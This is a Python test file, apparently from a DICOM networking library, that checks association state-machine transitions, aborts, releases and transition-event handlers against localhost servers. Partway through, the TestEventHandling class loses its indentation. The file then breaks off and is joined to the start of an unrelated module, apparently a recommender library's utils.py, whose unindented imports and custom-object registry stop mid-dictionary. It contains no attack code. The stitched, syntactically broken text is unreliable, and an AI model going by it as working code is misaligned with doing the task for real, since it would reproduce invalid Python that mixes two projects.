            ("Sta6", "Evt9", "DT-1"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt9", "DT-1"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt9", "DT-1"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt9", "DT-1"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt9", "DT-1"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt9", "DT-1"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt9", "DT-1"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt9", "DT-1"),
            ("Sta6", "Evt10", "DT-2"),
            ("Sta6", "Evt9", "DT-1"),
            ("Sta6", "Evt12", "AR-2"),
            ("Sta8", "Evt14", "AR-4"),
            ("Sta13", "Evt17", "AR-5"),
        ] == fsm._changes[:30]
class TestStateMachineFunctionalRequestor:
    """Functional tests for StateMachine as association requestor."""

    def setup(self):
        """Run prior to each test"""
        self.ae = None
        ae = AE()
        ae.add_requested_context(Verification)
        ae.acse_timeout = 5
        ae.dimse_timeout = 5
        assoc = Association(ae, mode="requestor")
        assoc.set_socket(AssociationSocket(assoc))
        # Association Acceptor object -> remote AE
        assoc.acceptor.ae_title = "ANY_SCU"
        assoc.acceptor.address = "localhost"
        assoc.acceptor.port = 11112
        # Association Requestor object -> local AE
        assoc.requestor.address = "localhost"
        assoc.requestor.port = 11113
        assoc.requestor.ae_title = ae.ae_title
        assoc.requestor.maximum_length = 16382
        assoc.requestor.implementation_class_uid = ae.implementation_class_uid
        assoc.requestor.implementation_version_name = ae.implementation_version_name
        cx = build_context(Verification)
        cx.context_id = 1
        assoc.requestor.requested_contexts = [cx]
        self.assoc = assoc
        self.fsm = self.monkey_patch(assoc.dul.state_machine)
        # Keep the original actions so tests that patch them can restore
        self.orig_ar2 = FINITE_STATE.ACTIONS["AR-2"]
        self.orig_ar4 = FINITE_STATE.ACTIONS["AR-4"]

    def teardown(self):
        """Clear any active threads"""
        if self.ae:
            self.ae.shutdown()
        # Restore any FSM actions patched by the tests
        FINITE_STATE.ACTIONS["AR-4"] = self.orig_ar4
        FINITE_STATE.ACTIONS["AR-2"] = self.orig_ar2
        time.sleep(0.1)

    def monkey_patch(self, fsm):
        """Monkey patch the StateMachine to add testing hooks."""
        # Record all state transitions
        fsm._transitions = []
        fsm.original_transition = fsm.transition

        def transition(state):
            fsm._transitions.append(state)
            fsm.original_transition(state)

        fsm.transition = transition
        # Record all event/state/actions
        fsm._changes = []
        fsm.original_action = fsm.do_action

        def do_action(event):
            if (event, fsm.current_state) in TRANSITION_TABLE:
                action_name = TRANSITION_TABLE[(event, fsm.current_state)]
                fsm._changes.append((fsm.current_state, event, action_name))
            fsm.original_action(event)

        fsm.do_action = do_action
        return fsm

    def test_monkey_patch(self):
        """Test monkey patching of StateMachine works as intended."""
        ae = AE()
        ae.add_requested_context(Verification)
        ae.acse_timeout = 5
        ae.dimse_timeout = 5
        assoc = Association(ae, mode="requestor")
        fsm = self.monkey_patch(assoc.dul.state_machine)
        assert fsm.current_state == "Sta1"
        fsm.current_state = "Sta13"
        fsm.do_action("Evt3")
        assert fsm._changes == [("Sta13", "Evt3", "AA-6")]
        assert fsm._transitions == ["Sta13"]

    def test_associate_accept_release(self):
        """Test normal association/release."""
        self.ae = ae = AE()
        ae.add_supported_context(Verification)
        scp = ae.start_server(("", 11112), block=False)
        assert self.fsm.current_state == "Sta1"
        self.assoc.start()
        timeout = 0
        while (
            not self.assoc.is_established
            and not self.assoc.is_rejected
            and not self.assoc.is_aborted
            and not self.assoc.dul._kill_thread
            and timeout < 10
        ):
            time.sleep(0.05)
            timeout += 0.05
        if self.assoc.is_established:
            self.assoc.release()
        # Wait for the FSM to return to idle before asserting
        timeout = 0
        while self.fsm.current_state != "Sta1" and timeout < 10:
            time.sleep(0.05)
            timeout += 0.05
        assert self.fsm._transitions == [
            "Sta4",  # Waiting for connection to complete
            "Sta5",  # Waiting for A-ASSOC-AC or -RJ PDU
            "Sta6",  # Assoc established
            "Sta7",  # Waiting for A-RELEASE-RP PDU
            "Sta1",  # Idle
        ]
        assert self.fsm._changes == [
            ("Sta1", "Evt1", "AE-1"),  # recv A-ASSOC rq primitive
            ("Sta4", "Evt2", "AE-2"),  # connection confirmed
            ("Sta5", "Evt3", "AE-3"),  # A-ASSOC-AC PDU recv
            ("Sta6", "Evt11", "AR-1"),  # A-RELEASE rq primitive
            ("Sta7", "Evt13", "AR-3"),  # A-RELEASE-RP PDU recv
        ]
        assert self.fsm.current_state == "Sta1"
        scp.shutdown()

    def test_associate_reject(self):
        """Test normal association rejection."""
        self.ae = ae = AE()
        # Require the called AE title so the association is rejected
        ae.require_called_aet = True
        ae.add_supported_context(Verification)
        scp = ae.start_server(("", 11112), block=False)
        assert self.fsm.current_state == "Sta1"
        self.assoc.start()
        timeout = 0
        while (
            not self.assoc.is_established
            and not self.assoc.is_rejected
            and not self.assoc.is_aborted
            and not self.assoc.dul._kill_thread
            and timeout < 10
        ):
            time.sleep(0.05)
            timeout += 0.05
        timeout = 0
        while self.fsm.current_state != "Sta1" and timeout < 10:
            time.sleep(0.05)
            timeout += 0.05
        assert self.assoc.is_rejected
        assert self.fsm._transitions == [
            "Sta4",  # Waiting for connection to complete
            "Sta5",  # Waiting for A-ASSOC-AC or -RJ PDU
            "Sta1",  # Idle
        ]
        assert self.fsm._changes == [
            ("Sta1", "Evt1", "AE-1"),  # recv A-ASSOC rq primitive
            ("Sta4", "Evt2", "AE-2"),  # connection confirmed
            ("Sta5", "Evt4", "AE-4"),  # A-ASSOC-RJ PDU recv
        ]
        assert self.fsm.current_state == "Sta1"
        scp.shutdown()

    def test_associate_accept_abort(self):
        """Test association acceptance then local abort."""
        self.ae = ae = AE()
        ae.acse_timeout = 5
        ae.add_supported_context(Verification)
        scp = ae.start_server(("", 11112), block=False)
        assert self.fsm.current_state == "Sta1"
        self.assoc.start()
        timeout = 0
        while (
            not self.assoc.is_established
            and not self.assoc.is_rejected
            and not self.assoc.is_aborted
            and not self.assoc.dul._kill_thread
            and timeout < 10
        ):
            time.sleep(0.05)
            timeout += 0.05
        if self.assoc.is_established:
            self.assoc.abort()
        timeout = 0
        while self.fsm.current_state != "Sta1" and timeout < 10:
            time.sleep(0.05)
            timeout += 0.05
        assert self.fsm._transitions == [
            "Sta4",  # Waiting for connection to complete
            "Sta5",  # Waiting for A-ASSOC-AC or -RJ PDU
            "Sta6",  # Assoc established
            "Sta13",  # Waiting for connection closed
            "Sta1",  # Idle
        ]
        assert self.fsm._changes == [
            ("Sta1", "Evt1", "AE-1"),  # recv A-ASSOC rq primitive
            ("Sta4", "Evt2", "AE-2"),  # connection confirmed
            ("Sta5", "Evt3", "AE-3"),  # A-ASSOC-AC PDU recv
            ("Sta6", "Evt15", "AA-1"),  # A-ABORT rq primitive
            ("Sta13", "Evt17", "AR-5"),  # connection closed
        ]
        assert self.fsm.current_state == "Sta1"
        scp.shutdown()

    def test_associate_accept_local_abort(self):
        """Test association acceptance then local abort if no cx."""
        self.ae = ae = AE()
        ae.acse_timeout = 5
        ae.add_supported_context(Verification)
        scp = ae.start_server(("", 11112), block=False)
        assert self.fsm.current_state == "Sta1"
        # Request a context the acceptor doesn't support so that no
        # contexts are accepted and the local side aborts
        self.assoc.requestor.requested_contexts[0].abstract_syntax = "1.2.3"
        self.assoc.start()
        timeout = 0
        while (
            not self.assoc.is_established
            and not self.assoc.is_rejected
            and not self.assoc.is_aborted
            and not self.assoc.dul._kill_thread
            and timeout < 10
        ):
            time.sleep(0.05)
            timeout += 0.05
        timeout = 0
        while self.fsm.current_state != "Sta1" and timeout < 10:
            time.sleep(0.05)
            timeout += 0.05
        assert self.fsm._transitions == [
            "Sta4",  # Waiting for connection to complete
            "Sta5",  # Waiting for A-ASSOC-AC or -RJ PDU
            "Sta6",  # Assoc established
            "Sta13",  # Waiting for connection close
            "Sta1",  # Idle
        ]
        assert self.fsm._changes == [
            ("Sta1", "Evt1", "AE-1"),  # A-ASSOC rq primitive
            ("Sta4", "Evt2", "AE-2"),  # connection confirmed
            ("Sta5", "Evt3", "AE-3"),  # A-ASSOC-AC PDU recv
            ("Sta6", "Evt15", "AA-1"),  # A-ABORT rq primitive
            ("Sta13", "Evt17", "AR-5"),  # Connection closed
        ]
        assert self.fsm.current_state == "Sta1"
        scp.shutdown()

    def test_associate_accept_peer_abort(self):
        """Test association acceptance then peer abort."""
        self.ae = ae = AE()
        # Short network timeout so the acceptor aborts the idle assoc
        ae.network_timeout = 0.5
        ae.acse_timeout = 5
        ae.add_supported_context(Verification)
        scp = ae.start_server(("", 11112), block=False)
        assert self.fsm.current_state == "Sta1"
        self.assoc.start()
        timeout = 0
        while (
            not self.assoc.is_established
            and not self.assoc.is_rejected
            and not self.assoc.is_aborted
            and not self.assoc.dul._kill_thread
            and timeout < 1
        ):
            time.sleep(0.05)
            timeout += 0.05
        timeout = 0
        while not self.assoc.is_established and timeout < 1:
            time.sleep(0.05)
            timeout += 0.05
        timeout = 0
        while not self.assoc.is_aborted and timeout < 1:
            time.sleep(0.05)
            timeout += 0.05
        timeout = 0
        while self.fsm.current_state != "Sta1" and timeout < 10:
            time.sleep(0.05)
            timeout += 0.05
        assert self.fsm._transitions == [
            "Sta4",  # Waiting for connection to complete
            "Sta5",  # Waiting for A-ASSOC-AC or -RJ PDU
            "Sta6",  # Assoc established
            "Sta1",  # Idle
        ]
        assert self.fsm._changes == [
            ("Sta1", "Evt1", "AE-1"),  # A-ASSOC rq primitive
            ("Sta4", "Evt2", "AE-2"),  # connection confirmed
            ("Sta5", "Evt3", "AE-3"),  # A-ASSOC-AC PDU recv
            ("Sta6", "Evt16", "AA-3"),  # A-ABORT-RQ PDV recv
        ]
        scp.shutdown()

    def test_associate_send_data(self):
        """Test association acceptance then send DIMSE message."""
        self.ae = ae = AE()
        ae.add_supported_context(Verification)
        scp = ae.start_server(("", 11112), block=False)
        assert self.fsm.current_state == "Sta1"
        self.assoc.start()
        timeout = 0
        while (
            not self.assoc.is_established
            and not self.assoc.is_rejected
            and not self.assoc.is_aborted
            and not self.assoc.dul._kill_thread
            and timeout < 10
        ):
            time.sleep(0.05)
            timeout += 0.05
        self.assoc.send_c_echo()
        self.assoc.release()
        timeout = 0
        while self.fsm.current_state != "Sta1" and timeout < 10:
            time.sleep(0.05)
            timeout += 0.05
        assert self.fsm._transitions == [
            "Sta4",  # Waiting for connection to complete
            "Sta5",  # Waiting for A-ASSOC-AC or -RJ PDU
            "Sta6",  # Assoc established
            "Sta6",
            "Sta6",
            "Sta7",  # Waiting for A-RELEASE-RP PDU
            "Sta1",  # Idle
        ]
        assert self.fsm._changes == [
            ("Sta1", "Evt1", "AE-1"),  # A-ASSOC rq primitive
            ("Sta4", "Evt2", "AE-2"),  # connection confirmed
            ("Sta5", "Evt3", "AE-3"),  # A-ASSOC-AC PDU recv
            ("Sta6", "Evt9", "DT-1"),  # P-DATA rq primitive
            ("Sta6", "Evt10", "DT-2"),  # P-DATA-TF PDU recv
            ("Sta6", "Evt11", "AR-1"),  # A-RELEASE rq primitive
            ("Sta7", "Evt13", "AR-3"),  # A-RELEASE-RP PDU recv
        ]
        assert self.fsm.current_state == "Sta1"
        scp.shutdown()

    def test_release_AR6(self):
        """Test receive P-DATA-TF while waiting for A-RELEASE-RP."""

        # Requestor sends A-RELEASE-RQ, acceptor sends P-DATA-TF then
        # A-RELEASE-RP
        # Patch AR-4 to also send a P-DATA-TF
        def AR_4(dul):
            # Send C-ECHO-RQ
            dul.socket.send(p_data_tf)
            # Normal release response
            dul.pdu = A_RELEASE_RP()
            dul.pdu.from_primitive(dul.primitive)
            # Callback
            dul.socket.send(dul.pdu.encode())
            dul.artim_timer.start()
            return "Sta13"

        # In this case the association acceptor will hit AR_4
        FINITE_STATE.ACTIONS["AR-4"] = ("Bluh", AR_4, "Sta13")
        self.ae = ae = AE()
        ae.add_supported_context(Verification)
        scp = ae.start_server(("", 11112), block=False)
        assert self.fsm.current_state == "Sta1"
        self.assoc.start()
        timeout = 0
        while (
            not self.assoc.is_established
            and not self.assoc.is_rejected
            and not self.assoc.is_aborted
            and not self.assoc.dul._kill_thread
            and timeout < 10
        ):
            time.sleep(0.05)
            timeout += 0.05
        self.assoc.release()
        timeout = 0
        while self.fsm.current_state != "Sta1" and timeout < 10:
            time.sleep(0.05)
            timeout += 0.05
        assert self.fsm._transitions == [
            "Sta4",  # Waiting for connection to complete
            "Sta5",  # Waiting for A-ASSOC-AC or -RJ PDU
            "Sta6",  # Assoc established
            "Sta7",
            "Sta7",  # Waiting for A-RELEASE-RP PDU
            "Sta1",  # Idle
        ]
        assert self.fsm._changes == [
            ("Sta1", "Evt1", "AE-1"),  # A-ASSOC rq primitive
            ("Sta4", "Evt2", "AE-2"),  # connection confirmed
            ("Sta5", "Evt3", "AE-3"),  # A-ASSOC-AC PDU recv
            ("Sta6", "Evt11", "AR-1"),  # A-RELEASE rq primitive
            ("Sta7", "Evt10", "AR-6"),  # P-DATA-TF PDU recv
            ("Sta7", "Evt13", "AR-3"),  # A-RELEASE-RP PDU recv
        ]
        assert self.fsm.current_state == "Sta1"
        scp.shutdown()

    def test_release_AR7(self):
        """Test receive P-DATA primitive after A-RELEASE-RQ PDU."""

        def AR_2(dul):
            """AR-2 occurs when an A-RELEASE-RQ PDU is received."""
            # Add P-DATA primitive request
            primitive = C_ECHO()
            primitive.MessageID = 1
            primitive.AffectedSOPClassUID = Verification
            # Send C-ECHO request to the peer via DIMSE and wait for the response
            dul.assoc.dimse.send_msg(primitive, 1)
            # Normal AR2 response
            dul.to_user_queue.put(dul.primitive)
            return "Sta8"

        # In this case the association acceptor will hit AR_2
        FINITE_STATE.ACTIONS["AR-2"] = ("Bluh", AR_2, "Sta8")
        self.ae = ae = AE()
        ae.add_supported_context(Verification)
        scp = ae.start_server(("", 11112), block=False)
        assert self.fsm.current_state == "Sta1"
        self.assoc.start()
        timeout = 0
        while (
            not self.assoc.is_established
            and not self.assoc.is_rejected
            and not self.assoc.is_aborted
            and not self.assoc.dul._kill_thread
            and timeout < 10
        ):
            time.sleep(0.05)
            timeout += 0.05
        self.assoc.release()
        timeout = 0
        while self.fsm.current_state != "Sta1" and timeout < 10:
            time.sleep(0.05)
            timeout += 0.05
        assert self.fsm._transitions == [
            "Sta4",  # Waiting for connection to complete
            "Sta5",  # Waiting for A-ASSOC-AC or -RJ PDU
            "Sta6",  # Assoc established
            "Sta7",
            "Sta7",  # Waiting for A-RELEASE-RP PDU
            "Sta1",  # Idle
        ]
        assert self.fsm._changes == [
            ("Sta1", "Evt1", "AE-1"),  # A-ASSOC rq primitive
            ("Sta4", "Evt2", "AE-2"),  # connection confirmed
            ("Sta5", "Evt3", "AE-3"),  # A-ASSOC-AC PDU recv
            ("Sta6", "Evt11", "AR-1"),  # A-RELEASE rq primitive
            ("Sta7", "Evt10", "AR-6"),  # P-DATA-TF PDU recv
            ("Sta7", "Evt13", "AR-3"),  # A-RELEASE-RP PDU recv
        ]
        assert self.fsm.current_state == "Sta1"
        scp.shutdown()
class TestStateMachineFunctionalAcceptor:
    """Functional tests for StateMachine as association acceptor."""

    def setup(self):
        """Run prior to each test"""
        self.ae = None
        ae = AE()
        ae.add_requested_context(Verification)
        ae.acse_timeout = 5
        ae.dimse_timeout = 5
        assoc = Association(ae, mode="requestor")
        assoc.set_socket(AssociationSocket(assoc))
        # Association Acceptor object -> remote AE
        assoc.acceptor.ae_title = "ANY_SCU"
        assoc.acceptor.address = "localhost"
        assoc.acceptor.port = 11112
        # Association Requestor object -> local AE
        assoc.requestor.address = "localhost"
        assoc.requestor.port = 11113
        assoc.requestor.ae_title = ae.ae_title
        assoc.requestor.maximum_length = 16382
        assoc.requestor.implementation_class_uid = ae.implementation_class_uid
        assoc.requestor.implementation_version_name = ae.implementation_version_name
        cx = build_context(Verification)
        cx.context_id = 1
        assoc.requestor.requested_contexts = [cx]
        self.assoc = assoc
        self.fsm = self.monkey_patch(assoc.dul.state_machine)
        # Keep the original AE-2 action so the test that patches it can restore
        self.orig_entry = FINITE_STATE.ACTIONS["AE-2"]

    def teardown(self):
        """Clear any active threads"""
        if self.ae:
            self.ae.shutdown()
        # Restore the patched FSM action
        FINITE_STATE.ACTIONS["AE-2"] = self.orig_entry

    def monkey_patch(self, fsm):
        """Monkey patch the StateMachine to add testing hooks."""
        # Record all state transitions
        fsm._transitions = []
        fsm.original_transition = fsm.transition

        def transition(state):
            fsm._transitions.append(state)
            fsm.original_transition(state)

        fsm.transition = transition
        # Record all event/state/actions
        fsm._changes = []
        fsm.original_action = fsm.do_action

        def do_action(event):
            if (event, fsm.current_state) in TRANSITION_TABLE:
                action_name = TRANSITION_TABLE[(event, fsm.current_state)]
                fsm._changes.append((fsm.current_state, event, action_name))
            fsm.original_action(event)

        fsm.do_action = do_action
        return fsm

    def test_invalid_protocol_version(self):
        """Test receiving an A-ASSOC-RQ with invalid protocol version."""
        self.ae = ae = AE()
        ae.add_supported_context(Verification)
        scp = ae.start_server(("", 11112), block=False)
        assert self.fsm.current_state == "Sta1"

        # Patch AE-2 so the outgoing A-ASSOCIATE-RQ carries a bad version
        def AE_2(dul):
            dul.pdu = A_ASSOCIATE_RQ()
            dul.pdu.from_primitive(dul.primitive)
            dul.pdu.protocol_version = 0x0002
            bytestream = dul.pdu.encode()
            dul.socket.send(bytestream)
            return "Sta5"

        FINITE_STATE.ACTIONS["AE-2"] = ("Bluh", AE_2, "Sta5")
        self.assoc.start()
        timeout = 0
        while (
            not self.assoc.is_established
            and not self.assoc.is_rejected
            and not self.assoc.is_aborted
            and not self.assoc.dul._kill_thread
            and timeout < 10
        ):
            time.sleep(0.05)
            timeout += 0.05
        # Acceptor must reject: result 0x01, source 0x02, diagnostic 0x02
        assert self.assoc.is_rejected
        assert self.assoc.acceptor.primitive.result == 0x01
        assert self.assoc.acceptor.primitive.result_source == 0x02
        assert self.assoc.acceptor.primitive.diagnostic == 0x02
        timeout = 0
        while self.fsm.current_state != "Sta1" and timeout < 10:
            time.sleep(0.05)
            timeout += 0.05
        assert self.fsm.current_state == "Sta1"
        scp.shutdown()
class TestEventHandling:
"""Test the FSM event handlers."""
def setup(self):
    """Run prior to each test; no AE is active until a test creates one."""
    self.ae = None
def teardown(self):
    """Shut down any AE started by the test."""
    if self.ae:
        self.ae.shutdown()
def test_no_handlers(self):
    """Test with no handlers bound."""
    self.ae = ae = AE()
    # "1.2.840.10008.1.1" is the Verification SOP Class UID
    ae.add_supported_context("1.2.840.10008.1.1")
    ae.add_requested_context("1.2.840.10008.1.1")
    scp = ae.start_server(("", 11112), block=False)
    # Neither server, requestor assoc, nor the server's child assoc
    # should report any bound EVT_FSM_TRANSITION handlers
    assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
    assoc = ae.associate("localhost", 11112)
    assert assoc.is_established
    assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
    child = scp.active_associations[0]
    assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
    assoc.release()
    scp.shutdown()
def test_transition_acceptor(self):
    """Test EVT_FSM_TRANSITION as acceptor."""
    triggered = []

    def handle(event):
        triggered.append(event)

    self.ae = ae = AE()
    ae.add_supported_context("1.2.840.10008.1.1")
    ae.add_requested_context("1.2.840.10008.1.1")
    # Bind the handler at server start; child associations inherit it
    handlers = [(evt.EVT_FSM_TRANSITION, handle)]
    scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
    assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
    assoc = ae.associate("localhost", 11112)
    assert assoc.is_established
    # The requestor side has no handler bound; the acceptor child does
    assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
    child = scp.active_associations[0]
    assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
    assoc.release()
    timeout = 0
    while scp.active_associations and timeout < 10:
        time.sleep(0.05)
        timeout += 0.05
    # Each triggered event carries the transition details
    for event in triggered:
        assert hasattr(event, "current_state")
        assert hasattr(event, "fsm_event")
        assert hasattr(event, "action")
        assert hasattr(event, "next_state")
        assert isinstance(event.assoc, Association)
        assert isinstance(event.timestamp, datetime.datetime)
        assert event.event.name == "EVT_FSM_TRANSITION"
        assert event.event.description == "State machine about to transition"
    states = [ee.current_state for ee in triggered]
    # Acceptor path: idle -> connect -> assoc -> established -> release
    assert states[:6] == ["Sta1", "Sta2", "Sta3", "Sta6", "Sta8", "Sta13"]
    scp.shutdown()
def test_transition_acceptor_bind(self):
    """Test binding EVT_FSM_TRANSITION to a running acceptor.

    The handler is bound *after* the association is established, so only
    the release-side transitions (Sta6 -> Sta8 -> Sta13) are recorded.
    """
    triggered = []

    def handle(event):
        triggered.append(event)

    self.ae = ae = AE()
    ae.add_supported_context("1.2.840.10008.1.1")
    ae.add_requested_context("1.2.840.10008.1.1")
    scp = ae.start_server(("", 11112), block=False)
    assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
    assoc = ae.associate("localhost", 11112)
    assert assoc.is_established
    time.sleep(0.5)
    child = scp.active_associations[0]
    assert child.dul.state_machine.current_state == "Sta6"
    assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
    assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
    # Binding on the server propagates to its active child associations
    scp.bind(evt.EVT_FSM_TRANSITION, handle)
    assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
    child = scp.active_associations[0]
    assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
    assoc.release()
    timeout = 0
    while scp.active_associations and timeout < 10:
        time.sleep(0.05)
        timeout += 0.05
    for event in triggered:
        assert hasattr(event, "current_state")
        assert hasattr(event, "fsm_event")
        assert hasattr(event, "action")
        assert hasattr(event, "next_state")
        assert isinstance(event.assoc, Association)
        assert isinstance(event.timestamp, datetime.datetime)
    states = [ee.current_state for ee in triggered]
    # Only post-bind transitions are seen
    assert states[:3] == ["Sta6", "Sta8", "Sta13"]
    # Shut the server down explicitly, matching the sibling tests
    # (previously this test relied solely on teardown's ae.shutdown())
    scp.shutdown()
def test_transition_acceptor_unbind(self):
    """Test unbinding EVT_FSM_TRANSITION from a running acceptor.

    The handler is unbound after the association is established, so only
    the establishment transitions (Sta1 -> Sta2 -> Sta3) are recorded.
    """
    triggered = []

    def handle(event):
        triggered.append(event)

    self.ae = ae = AE()
    ae.add_supported_context("1.2.840.10008.1.1")
    ae.add_requested_context("1.2.840.10008.1.1")
    handlers = [(evt.EVT_FSM_TRANSITION, handle)]
    scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
    # Confirm that the handler is bound
    assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
    assoc = ae.associate("localhost", 11112)
    assert assoc.is_established
    time.sleep(0.5)
    # Acceptor association
    child = scp.active_associations[0]
    # At this point we *must* have gone Sta1 -> Sta2 -> Sta3 -> Sta6
    assert child.dul.state_machine.current_state == "Sta6"
    assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
    # Unbind the handler and confirm that its unbound
    scp.unbind(evt.EVT_FSM_TRANSITION, handle)
    assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
    child = scp.active_associations[0]
    assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
    # Should go Sta6 -> Sta8 -> Sta13 without triggering the handler
    assoc.release()
    timeout = 0
    while scp.active_associations and timeout < 10:
        time.sleep(0.05)
        timeout += 0.05
    time.sleep(0.5)
    for event in triggered:
        assert hasattr(event, "current_state")
        assert hasattr(event, "fsm_event")
        assert hasattr(event, "action")
        assert hasattr(event, "next_state")
        assert isinstance(event.assoc, Association)
        assert isinstance(event.timestamp, datetime.datetime)
    states = [ee.current_state for ee in triggered]
    # Leftover debug print(states) removed - it polluted test output
    assert states[:3] == ["Sta1", "Sta2", "Sta3"]
    scp.shutdown()
def test_transition_requestor(self):
    """Test EVT_FSM_TRANSITION as requestor."""
    triggered = []

    def handle(event):
        triggered.append(event)

    self.ae = ae = AE()
    ae.add_supported_context("1.2.840.10008.1.1")
    ae.add_requested_context("1.2.840.10008.1.1")
    # Bind the handler on the requestor association only
    handlers = [(evt.EVT_FSM_TRANSITION, handle)]
    scp = ae.start_server(("", 11112), block=False)
    assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
    assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
    assert assoc.is_established
    # Neither the server nor its child association has the handler
    assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
    child = scp.active_associations[0]
    assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
    assoc.release()
    timeout = 0
    while not assoc.is_released and timeout < 10:
        time.sleep(0.05)
        timeout += 0.05
    for event in triggered:
        assert hasattr(event, "current_state")
        assert hasattr(event, "fsm_event")
        assert hasattr(event, "action")
        assert hasattr(event, "next_state")
        assert isinstance(event.assoc, Association)
        assert isinstance(event.timestamp, datetime.datetime)
    states = [ee.current_state for ee in triggered]
    # Requestor path: idle -> connect -> await AC -> established -> release
    assert states[:5] == ["Sta1", "Sta4", "Sta5", "Sta6", "Sta7"]
    scp.shutdown()
def test_transition_requestor_bind(self):
    """Test EVT_FSM_TRANSITION as requestor."""
    triggered = []

    def handle(event):
        triggered.append(event)

    self.ae = ae = AE()
    ae.add_supported_context("1.2.840.10008.1.1")
    ae.add_requested_context("1.2.840.10008.1.1")
    scp = ae.start_server(("", 11112), block=False)
    # Associate first, then bind -- so the association-establishment
    # transitions (Sta1/Sta4/Sta5) happen before recording starts.
    assoc = ae.associate("localhost", 11112)
    assert assoc.is_established
    assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
    assoc.bind(evt.EVT_FSM_TRANSITION, handle)
    assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
    assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
    child = scp.active_associations[0]
    assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
    assoc.release()
    # Poll (max ~10 s) until the release completes.
    timeout = 0
    while not assoc.is_released and timeout < 10:
        time.sleep(0.05)
        timeout += 0.05
    for event in triggered:
        assert hasattr(event, "current_state")
        assert hasattr(event, "fsm_event")
        assert hasattr(event, "action")
        assert hasattr(event, "next_state")
        assert isinstance(event.assoc, Association)
        assert isinstance(event.timestamp, datetime.datetime)
    states = [ee.current_state for ee in triggered]
    # Only the release-time transitions are seen: established -> release
    assert states[:2] == ["Sta6", "Sta7"]
    scp.shutdown()
def test_transition_requestor_unbind(self):
    """Test EVT_FSM_TRANSITION as requestor."""
    triggered = []

    def handle(event):
        triggered.append(event)

    self.ae = ae = AE()
    ae.add_supported_context("1.2.840.10008.1.1")
    ae.add_requested_context("1.2.840.10008.1.1")
    handlers = [(evt.EVT_FSM_TRANSITION, handle)]
    scp = ae.start_server(("", 11112), block=False)
    assoc = ae.associate("localhost", 11112, evt_handlers=handlers)
    assert assoc.is_established
    assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
    # Unbind after establishment; release-time transitions go unrecorded.
    assoc.unbind(evt.EVT_FSM_TRANSITION, handle)
    assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
    assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
    child = scp.active_associations[0]
    assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
    assoc.release()
    # Poll (max ~10 s) until the release completes.
    timeout = 0
    while not assoc.is_released and timeout < 10:
        time.sleep(0.05)
        timeout += 0.05
    for event in triggered:
        assert hasattr(event, "current_state")
        assert hasattr(event, "fsm_event")
        assert hasattr(event, "action")
        assert hasattr(event, "next_state")
        assert isinstance(event.assoc, Association)
        assert isinstance(event.timestamp, datetime.datetime)
    states = [ee.current_state for ee in triggered]
    # Only the establishment transitions were captured before the unbind.
    assert states[:3] == ["Sta1", "Sta4", "Sta5"]
    scp.shutdown()
def test_transition_raises(self, caplog):
    """Test the handler for EVT_FSM_TRANSITION raising exception."""
    # A handler exception must be logged, not propagate or kill the FSM.
    def handle(event):
        raise NotImplementedError("Exception description")

    self.ae = ae = AE()
    ae.add_supported_context(Verification)
    ae.add_requested_context(Verification)
    handlers = [(evt.EVT_FSM_TRANSITION, handle)]
    scp = ae.start_server(("", 11112), block=False, evt_handlers=handlers)
    with caplog.at_level(logging.ERROR, logger="pynetdicom"):
        # Despite the handler raising on every transition, association
        # establishment and release must still succeed.
        assoc = ae.associate("localhost", 11112)
        assert assoc.is_established
        assoc.release()
        # Poll (max ~10 s) for the server to clean up the association.
        timeout = 0
        while scp.active_associations and timeout < 10:
            time.sleep(0.05)
            timeout += 0.05
        scp.shutdown()

        # The exception should have been caught and logged by pynetdicom.
        msg = (
            "Exception raised in user's 'evt.EVT_FSM_TRANSITION' event "
            "handler 'handle'"
        )
        assert msg in caplog.text
        assert "Exception description" in caplog.text
|
utils.py | import collections
import json
import logging
from threading import Thread
import requests
from tensorflow.python.keras.layers import Concatenate
from .activations import *
from .layers import *
from .sequence import *
try:
from packaging.version import parse
except ImportError:
from pip._vendor.packaging.version import parse
# Name -> class registry of DeepCTR's custom Keras objects.  Pass this as
# `custom_objects` when loading a saved model so these layers deserialize.
custom_objects = {'InnerProductLayer': InnerProductLayer,
                  'OutterProductLayer': OutterProductLayer,
                  'MLP': MLP,
                  'PredictionLayer': PredictionLayer,
                  'FM': FM,
                  'AFMLayer': AFMLayer,
                  'CrossNet': CrossNet,
                  'BiInteractionPooling': BiInteractionPooling,
                  'LocalActivationUnit': LocalActivationUnit,
                  'Dice': Dice,
                  'SequencePoolingLayer': SequencePoolingLayer,
